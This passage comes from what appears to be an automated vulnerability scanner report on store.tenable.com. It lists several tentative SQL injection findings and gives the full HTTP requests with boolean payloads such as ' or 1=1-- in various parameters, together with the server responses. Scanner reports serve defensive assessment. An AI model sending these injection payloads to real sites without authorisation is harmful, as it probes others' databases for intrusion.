       sensitivity: 7, /* number = sensitivity threshold (must be 1 or higher) */
       interval: 0, /* number = milliseconds for onMouseOver polling interval */
       over: show, /* function = onMouseOver callback (REQUIRED) */
       timeout: 500, /* number = milliseconds delay before onMouseOut */
       out: hide /* function = onMouseOut callback (REQUIRED) */
   });
});

// #navSearch interaction;
jQuery(function($){
$('#navSearch label').each(function(i){ // loop through each LABEL to hide;
var obj = '#' + $(this).attr('for'); // find the TARGET form field;
var val = $(this).html(); // record the
...[SNIP]...

1.15. https://store.tenable.com/includes/templates/tenable/jscript/t.js [v parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/jscript/t.js

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 16089195%20or%201%3d1--%20 and 16089195%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes/templates/tenable/jscript/t.js?v=116089195%20or%201%3d1--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:48:22 GMT
Server: Apache
Content-Length: 241
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes/templates/tenable/jscript/t.js
on this server.</p>
</body></html>

Request 2

GET /includes/templates/tenable/jscript/t.js?v=116089195%20or%201%3d2--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:48:22 GMT
Server: Apache
Last-Modified: Mon, 06 Dec 2010 18:50:02 GMT
ETag: "12ee26-293d-5b094a80"
Accept-Ranges: bytes
Content-Length: 10557
Connection: close
Content-Type: application/x-javascript

// helper classes;
jQuery(function($){
// browser font inconsistantcies;
if($.browser.safari === true) {
$('body').addClass('webkit');
}
if(navigator.userAgent.indexOf('Win') > 0) {
$('body').addClass('windows');
}

// IE lack of CSS3 support;
$('div.moduleSubsection:last-child').addClass('last-child');
$('div.moduleProduct:last-child').addClass('last-child');
$('div.moduleCarousel:last-child').addClass('last-child');
$('#nav li:first-child').addClass('first-child');
$('#nav li:last-child').addClass('last-child');

if($.browser.msie === true && parseInt($.browser.version, 10) < 7) {
$('input[type=text]').addClass('text');
$('input[type=submit]').addClass('submit');
}
});

// #navMain interaction;
jQuery(function($){
function show(){
$('#navMain li.hover').removeClass('hover');
       $(this).addClass('hover');
   }
function hide(){
       $(this).removeClass('hover');
   }

$('#navMain>ul>li').hoverIntent({
       sensitivity: 7, /* number = sensitivity threshold (must be 1 or higher) */
       interval: 0, /* number = milliseconds for onMouseOver polling interval */
       over: show, /* function = onMouseOver callback (REQUIRED) */
       timeout: 500, /* number = milliseconds delay before onMouseOut */
       out: hide /* function = onMouseOut callback (REQUIRED) */
   });
});

// #navSearch interaction;
jQuery(function($){
$('#navSearch label').each(function(i){ // loop through each LABEL to hide;
var obj = '#' + $(this).attr('for'); // find the TARGET form field;
var val = $(this).html(); // record the
...[SNIP]...

1.16. https://store.tenable.com/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 32125367'%20or%201%3d1--%20 and 32125367'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php32125367'%20or%201%3d1--%20?main_page=product_info&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:53:21 GMT
Server: Apache
Content-Length: 230
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php32125367' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /index.php32125367'%20or%201%3d2--%20?main_page=product_info&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:53:21 GMT
Server: Apache
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php32125367' or 1=2-- was not found on this server.</p>
</body></html>

1.17. https://store.tenable.com/index.php [action parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The action parameter appears to be vulnerable to SQL injection attacks. The payloads 11258655'%20or%201%3d1--%20 and 11258655'%20or%201%3d2--%20 were each submitted in the action parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /index.php?main_page=product_info&cPath=5&products_id=9&action=add_product11258655'%20or%201%3d1--%20&zenid=5717419e1ab4b29ffbd339c41541e7c7 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
Cache-Control: max-age=0
Origin: https://store.tenable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOO8tZKUWmYxANA9
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Content-Length: 244

------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="cart_quantity"

1
------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="products_id"

9

...[SNIP]...

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:54:14 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php
on this server.</p>
</body></html>

Request 2

POST /index.php?main_page=product_info&cPath=5&products_id=9&action=add_product11258655'%20or%201%3d2--%20&zenid=5717419e1ab4b29ffbd339c41541e7c7 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
Cache-Control: max-age=0
Origin: https://store.tenable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOO8tZKUWmYxANA9
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Content-Length: 244

------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="cart_quantity"

1
------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="products_id"

9

...[SNIP]...

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:54:14 GMT
Server: Apache
Set-Cookie: zenid=5717419e1ab4b29ffbd339c41541e7c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 29916

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta name="description" content="Tenable Store 1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - Tenable Nessus Perimeter Service is a remote vulnerability scanning service that you can use to audit your Internet facing IP addresses for both network and web application vulnerabilities. The Nessus Perimeter Service portal provides secure access to detailed vulnerability audits and remediation information on our infrastructure. You can access the " />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javasc
...[SNIP]...

1.18. https://store.tenable.com/index.php [cPath parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The cPath parameter appears to be vulnerable to SQL injection attacks. The payloads 10615830%20or%201%3d1--%20 and 10615830%20or%201%3d2--%20 were each submitted in the cPath parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php?main_page=product_info&cPath=510615830%20or%201%3d1--%20&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:47:19 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php
on this server.</p>
</body></html>

Request 2

GET /index.php?main_page=product_info&cPath=510615830%20or%201%3d2--%20&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:47:19 GMT
Server: Apache
Set-Cookie: zenid=fe4444dea39d8df723e73385f265080f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 28356

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta name="description" content="Tenable Store 1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - Tenable Nessus Perimeter Service is a remote vulnerability scanning service that you can use to audit your Internet facing IP addresses for both network and web application vulnerabilities. The Nessus Perimeter Service portal provides secure access to detailed vulnerability audits and remediation information on our infrastructure. You can access the " />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />
<meta name="robots" content="noindex, nofollow" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cy
...[SNIP]...

1.19. https://store.tenable.com/index.php [cart_quantity parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The cart_quantity parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cart_quantity parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?main_page=product_info&cPath=5&products_id=9&action=add_product&zenid=5717419e1ab4b29ffbd339c41541e7c7 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
Cache-Control: max-age=0
Origin: https://store.tenable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOO8tZKUWmYxANA9
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Content-Length: 244

------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="cart_quantity"

1'
------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="products_id"

9
------WebKitFormBoundaryUOO8tZKUWmYxANA9--

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:00 GMT
Server: Apache
Set-Cookie: zenid=5717419e1ab4b29ffbd339c41541e7c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 26402

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>The Shopping Cart : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...
<div class="messageStackCaution larger">
...[SNIP]...

Request 2

POST /index.php?main_page=product_info&cPath=5&products_id=9&action=add_product&zenid=5717419e1ab4b29ffbd339c41541e7c7 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
Cache-Control: max-age=0
Origin: https://store.tenable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOO8tZKUWmYxANA9
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Content-Length: 244

------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="cart_quantity"

1''
------WebKitFormBoundaryUOO8tZKUWmYxANA9
Content-Disposition: form-data; name="products_id"

9
------WebKitFormBoundaryUOO8tZKUWmYxANA9--

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:01 GMT
Server: Apache
Set-Cookie: zenid=5717419e1ab4b29ffbd339c41541e7c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 26188

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>The Shopping Cart : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...

1.20. https://store.tenable.com/index.php [main_page parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The main_page parameter appears to be vulnerable to SQL injection attacks. The payloads 11912762'%20or%201%3d1--%20 and 11912762'%20or%201%3d2--%20 were each submitted in the main_page parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php?main_page=product_info11912762'%20or%201%3d1--%20&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:47:04 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php
on this server.</p>
</body></html>

Request 2

GET /index.php?main_page=product_info11912762'%20or%201%3d2--%20&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:47:04 GMT
Server: Apache
Set-Cookie: zenid=3a66f5532203e85d8d78f3164792aeb4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 21052

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Page Not Found : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping Page Not Found" />
<meta name="description" content="Tenable Store : Page Not Found - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/t.js?v=1"></script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2024167-3']);
_gaq.push(['_setDomainName', '.tenable.com']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga
...[SNIP]...

1.21. https://store.tenable.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 72255422%20or%201%3d1--%20 and 72255422%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php?main_page=product_info&cPath=5&products_id=9&172255422%20or%201%3d1--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:50:58 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php
on this server.</p>
</body></html>

Request 2

GET /index.php?main_page=product_info&cPath=5&products_id=9&172255422%20or%201%3d2--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:50:58 GMT
Server: Apache
Set-Cookie: zenid=9ab3f0946ae0b4784d1635c494781939; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 28529

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta name="description" content="Tenable Store 1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - Tenable Nessus Perimeter Service is a remote vulnerability scanning service that you can use to audit your Internet facing IP addresses for both network and web application vulnerabilities. The Nessus Perimeter Service portal provides secure access to detailed vulnerability audits and remediation information on our infrastructure. You can access the " />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javasc
...[SNIP]...

1.22. https://store.tenable.com/index.php [products_id parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

